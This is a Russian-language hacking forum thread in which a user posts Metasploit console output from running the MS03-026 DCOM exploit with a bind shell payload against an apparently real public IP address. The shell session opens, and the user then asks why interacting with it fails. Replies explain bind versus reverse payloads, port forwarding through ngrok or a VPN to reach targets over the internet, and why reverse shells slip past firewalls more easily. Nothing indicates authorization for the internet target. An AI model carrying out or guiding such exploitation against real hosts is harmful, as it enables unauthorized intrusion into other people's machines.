• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Нужен белый IP для эксплоита или нет?

wurdalak

Green Team
21.12.2019
18
2
BIT
0
Не прилетает meterpriter сессия создаётся. Нужен белый ip ?
Код:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

msf5 exploit(windows/dcerpc/ms03_026_dcom) >

[*] 93.213.65.23:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] 93.213.65.23:135 - Binding to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...

[*] 93.213.65.23:135 - Bound to 5d9f4ab8-7d1c-14cf-861e-0020af6e8c57:0.0@ncacn_ip_tcp:93.213.65.23[135] ...

[*] 93.213.65.23:135 - Sending exploit ...

[*] Started bind TCP handler against 93.213.65.23:135

[*] Command shell session 1 opened (0.0.0.0:0 -> 93.213.65.23:135) at 2020-10-03 14:57:58 +0700


msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -l


Active sessions

===============


  Id  Name  Type               Information  Connection

  --  ----  ----               -----------  ----------

  1         shell x86/windows               0.0.0.0:0 -> 93.213.65.23:135 (93.213.65.23)


msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i 1

[*] Starting interaction with 1...

shell


[*] Trying to find binary(python) on target machine

[-] Session manipulation failed: undefined method `reverse!' for nil:NilClass ["C:/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/

ork-5.0.97/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'", "C:/metasploit/apps/pro/ etc...
Подскажите, что не так делаю.
 

Mogen

Red Team
27.08.2019
316
614
BIT
29
А где вы пытайтесь применить эксплоит?
Если вы атакуете машину в локальной сети, то белый ip не нужен.
 

wurdalak

Green Team
21.12.2019
18
2
BIT
0
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
 

Mogen

Red Team
27.08.2019
316
614
BIT
29
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
Посмотри в интернете про проброс портов с помощью ngrok. На ютуб канале codeby есть видео про это.
 
Последнее редактирование:

wurdalak

Green Team
21.12.2019
18
2
BIT
0
ну да с локалки. с роутера переадресацию на локальную тачку сделал и всё, но получаеться надо впн так ведь?
 

Mogen

Red Team
27.08.2019
316
614
BIT
29
ну да с локалки. с роутера переадресацию на локальную тачку сделал и всё, но получаеться надо впн так ведь?
Мне каюется, что дело может быть в metasploit. Смотрю на вывод ошибки, и думаю, что на машине жертвы что-то не установлено (python судя по ошибке msf) или что-то с ruby на вашей машине, но это врятли.
 

specical bat

Well-known member
17.10.2018
46
-1
BIT
0
Вроде как должен быть свой статический ip, или vpn с возможностью открытия портов. Подойдет vpn , там можно открыть порты от 1000. Если нужно ниже, то можно там же купить выделенный личный ip, при покупке от полугода. Если временной, на сутки версией пользуетесь, то после использования, нужно закрыть порт, который открыли.
 
05.10.2020
4
0
BIT
0
Вроде как должен быть свой статический ip, или vpn с возможностью открытия портов. Подойдет vpn , там можно открыть порты от 1000. Если нужно ниже, то можно там же купить выделенный личный ip, при покупке от полугода. Если временной, на сутки версией пользуетесь, то после использования, нужно закрыть порт, который открыли.
А как правильно пробросить все это дело к себе с впн?
 

BearSec

Platinum
20.04.2020
210
290
BIT
23
В интернете не локалка. Для set PAYLOAD windows/shell_bind_tcp всётаки нужен белый ip ну или vpn ? я думал биндит на удалённой машине шелл или всётаки нужен белый ипишник?
Варианты с белым ip или с использованием ngrok нужны при использовании reverse payload. Когда атакуемая машина, при успешном выполнении эксплоита, сама пытается к нам обратно подключится.

При успешной эксплотации и использовании bind payload атакуемая машина сама открывает у себя порт и ждёт, когда к ней кто-то подключится.

Чаще используют reverse, так как когда атакуемая машина сама подключается куда-то в интернет, фаерволы и антивирусы спокойнее к этому относятся, нежели когда непонятно кто лезет в неё из интернета (плюс надо понимать, что атакуемая машина может не иметь прямой доступ из интрнета, а сидит через шлюз и прочее прочее прочее...)

Вообще там еще есть отличия между windows/shell_bind_tcp и windows/shell/bind_tcp о них можно вот тут почитать
 

wurdalak

Green Team
21.12.2019
18
2
BIT
0
Хмм... в локалке на виртуалке с XP абсолютно такой же вывод
Код:
msf5 exploit(windows/dcerpc/ms03_026_dcom) >
[*] 192.168.1.8:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.1.8:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.8[135] ...
[*] 192.168.1.8:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.8[135] ...
[*] 192.168.1.8:135 - Sending exploit ...
[*] Started bind TCP handler against 192.168.1.8:135
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.8:135) at 2020-10-09 15:08:01 +0700

msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions 1
[*] Starting interaction with 1...
тоже IP понулям куда реверсит 0.0.0.0:0 , что за х.......я?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!